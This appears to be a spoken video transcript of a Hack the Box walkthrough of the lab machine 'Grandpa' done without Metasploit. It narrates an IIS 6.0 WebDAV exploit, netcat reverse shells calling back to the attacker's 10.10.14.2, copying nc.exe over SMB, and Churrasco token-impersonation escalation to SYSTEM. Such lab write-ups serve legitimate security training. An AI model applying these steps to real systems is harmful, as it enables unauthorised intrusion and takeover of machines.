Hey, so earlier this week, we went and we completed the Hack the Box machine, Grandpa, and we completed it using Metasploit modules. Well, I thought it would be fun if we hopped in there and we tried to, gain administrative privileges again, only this time coming from like a more of like a OSCP stance, right? Where we're not using our Metasploit modules, we're not using Meterpreter, we're not using any of those tools. We have to actually go out, find proof of concept codes. We're just going to rely less on automation. All right, let's hop into it. We've already done this machine. We've already gained administrative privileges on Grandpa. I'm not going to cover the nmap scanning of Grandpa. And we already know that our vulnerable way in is through the IIS 6.0 web dev. So let's try and exploit that without using Metasploit now. I'm going to hop in this exploit folder I made, open up a terminal, and I actually want to use Churrasco.exe here. And I've got my CVE number for that web dev exploit there. And so there we have our Metasploit module that we used earlier this week. And down here, we actually have a just a Python script. Now, I've already done this beforehand, and I don't want to waste everyone's time. For some reason, I can't get that Python script to run. I've used MSF Venom to give me some like shell code. Threw it in there, didn't quite work. But if we take that same CVE number and we go and we search for exploit code, we should be able to find one fairly easily that does work. All right. GitHub's always a great place to look. Let's see. Yeah, this looks like the one that I found earlier. All right. Let's go ahead and copy that. And we will hop back into our terminal. And we're going to go git clone and clone that repository here. There is our exploit right there. Let's see. Let's see what flags it takes. So it takes 4 arguments. It's going to take our target IP, our target port, a reverse IP, and a reverse port. So we're going to have to open up a new tab. Open up that new tab. Let's zoom in. Yeah, and let's go ahead and use netcat tac lvnp. And we're going to run this on quad 4. Come back over here. And I believe this is a Python 2 script. There we go. So we need our target IP. And the target port for the box is going to be port 80 because it's running on that web server. And then we're going to put in our IP, 10.10.14.2. And then we're going to put in quad 4 as our listener port. We're going to run this. Oh, is this not zoomed in for you guys? That is my bad. Hey, what if we hop over listener? Now we have shell access on our target machine. Say, who am I? NT authority / network service. The same user that we got the last time. So we are going to see if we can write to this directory that we're in. Probably don't have permissions to, but let's go ahead and try and do echo test to a test.txt file. Access is denied. So one of the places I like to go to and see if we have access to write to is the temp folder. cd %temp %. And now we're just going to try the same test, echo test to a test.txt file. Yep, we were able to write to a test.txt file. Let's just use the type command and make sure everything went in there like it was supposed to. Yep, there's our contents test. All right, I think our next step here is I want to get my netcat binary on here, just so I can set up another reverse shell, just in case I break anything. So I'm gonna go ahead and open a new tab, and we're gonna use the locate command, and we're gonna look for nc.exe. So it looks like there's nc.exe there. Let's copy that to our current directory as nc.exe. Yep, there it is. And now comes the hard part of getting it on over to our machine here. So this machine doesn't actually have PowerShell. I tried using cert-util earlier, and it wasn't happy with cert-util. But what we can do is we can come back to our attacking machine here, and we can use the smbserver.py to set up an SMB server that we can then copy files from and to in this directory here. Or we're going to set that up, SMB server. I think I have to run this as sudo SMB server.py, and let's just make this our share name is exploit, and the share path is going to be this current directory here. All right, now we should be able to reach out and download files from that path. So we're going to go copy, whack whack, 10.10.14.2, whack, I'm pretty sure I called that exploit, and we want to get that netcat binary. Nice. There's our netcat binary. And let's just make sure that's working. So let's open up another tab, set up another listener at 1337, hop back over here, use our nc.exe, tech-e, and cmd.exe. And that's going to go ahead and it's going to execute our cmd.exe and send it through that netcat client. But I forgot to actually put where our listener is at. 37. And now we can do our tech-e cmd.exe. There we go. Now I've got a shell over here, same spot. Everything should be the same. We can run who am I. Still running as network service, but if I happen to break anything or cause the connection to crash, it'll crash the connection from our reverse shell to this reverse shell, rather than losing our original reverse shell. I did do something earlier that caused me to have to restart the whole box. So I like doing it this way, just a little bit safer. We need to then look for privilege escalation paths. Now, I tried using winpeas.exe. That was unsuccessful for the most part. I then used winpeas.bat. I got some information back, but winpeas.bat didn't think that there was a good privilege escalation pathway there. Another thing that we can do is be getting some basic system information, and we can do that by typing system info. I'm pretty sure WinPeas will give this back to you as well. Here we can see that we have an x86-based PC. Here we actually have our OS name and version, so we're running Windows Server 2003. Now, because I didn't find any good privilege escalation pathways through those automated enumeration tools, I'm going to go ahead and try and find something here. See if we have anything that pops up for our Windows Server 2003. I tried some exploit code for there. What I did after that, though, is we did whoami/priv. Should give us some privilege information. And we have this SE impersonate privilege enabled here. And when we see that, we can attempt to use this tool. Where the heck is that tool? I don't believe it's on the box. It's I don't even know how to pronounce it. It's like Churrasco or something. Not churros. Churrasco exploit? Is that the one that we're looking for? Yeah, it looks right. Looks about right. Token kidnapping is what it's supposed to do. Um, Here we go. This is where we want to go. So I actually just want the exe here. So let me go ahead and let's download that. Move this into our exploit folder. Let's open a new tab. I don't like having to spell that out all the time, so I'm just going to copy and change that to ch.exe. But now we should be able to copy that from our SMB server here to our target machine. Copy, whack, whack, 10.10.14.2, and we used exploit ch.exe. And there it is. Now, with what this is supposed to do is supposed to run a command as nc.authority system. Yeah, so let's try that. I believe it's tac d, and you use tac d, and then it's got then you put the command that you want to run inside of there. And so we're going to point that netcat back to us. And this one, we'll do port 8080. And we're going to give ourselves a command prompt again. We do need to go set up another listener, though. There we go. So that's our current user. And found a thread to impersonate. There we go. Command should have ran as system. Come over here. We now have a connection on 8080 here. And we just type in, who am I? And here we are, nc.authority system. So we should be able to now get the user flag. Yep, so there's our user flag. And now we should also have permission to read the root flag. There we are. Now we've pwned this box for a second time, only this time we didn't need any Metasploit modules. Alright, well, thank you for watching. I hope you learned something new, especially with us not touching any Metasploit there. And I hope you're okay with me skipping over a bunch of pieces that we already knew or I already found out didn't work. If you have any questions, throw them in the comments below. And as always, there are 2 affiliate links there for Hack the Box in the description. All right, peace.